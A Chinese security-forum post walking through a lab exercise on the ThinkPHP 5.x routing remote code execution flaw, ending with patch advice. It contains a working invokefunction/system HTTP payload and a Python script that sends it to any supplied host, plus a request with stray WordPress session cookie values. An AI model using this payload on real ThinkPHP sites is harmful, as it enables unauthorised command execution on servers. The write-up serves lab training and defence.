安全矩阵

 找回密码
 立即注册
搜索
查看: 2507|回复: 0

thinkphp_5 命令执行

[复制链接]

46

主题

165

帖子

731

积分

高级会员

Rank: 4

积分
731
发表于 2020-8-11 20:09:32 | 显示全部楼层 |阅读模式
1. 漏洞描述
Thinkphp5.x 版本(5.0.20)中没有对路由中的控制器进行严格过滤,在存在 admin,index 模块、没有开启强制路由的条件下(默认不开启),导致可以注入恶意代码利用反射类调用命名空间其他任意内置类,完成远程代码执行。

二、影响版本
ThinkPHP 5.x < ThinkPHP 5.1.31<= ThinkPHP 5.0.23

三、利用流程
靶场基本信息

靶场地址:10.10.11.20:19809

靶场名称: Thinkphp5

靶场描述: Thinkphp5 命令执行

尝试 poc,查询/tmp目录下的flag

  1. GET /index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/tmp HTTP/1.1
  2. Host: 10.10.11.20:19809
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  5. Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
  6. Accept-Encoding: gzip, deflate
  7. Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_07be81f78d509865b1926609964cf0ca=admin%7C1590115158%7CN20HCrC96zVmXgHk0BlnkROKbvQd4vf8nAxZoe2G7Uf%7C24b3491dd375a352ed0e49eb87acb2af156ffc23524cdc515962f170639193d5; wp-settings-time-1=1589947833
  8. DNT: 1
  9. X-Forwarded-For: 8.8.8.8
  10. Connection: close
  11. Upgrade-Insecure-Requests: 1
复制代码
执行结果成功

尝试编写 poc
  1. import requests
  2. import sys
  3. def run(ip):
  4.     poc = "/index.php/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/tmp"  
  5.     header = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0', }
  6.     url = ip+poc
  7.     req = requests.get(url, header)
  8.     if req.status_code == 200:
  9.         if "flag" in req.text:
  10.             print(req.text)
  11. if __name__ == '__main__':
  12.     url = sys.argv[1]
  13.     if url[:4] != "http":
  14.         url = "http://"+url
  15.     run(url)
复制代码



复制结果提交,通关

四、修复方案
1、官网已发布安全更新,用户可以通过网址http://www.thinkphp.cn/topic/60400.html 获得.

2、建议使用以上 ThinkPHP5 开发的内容管理系统的用户及时检查是否存在该漏洞。


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-29 13:53 , Processed in 0.014409 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表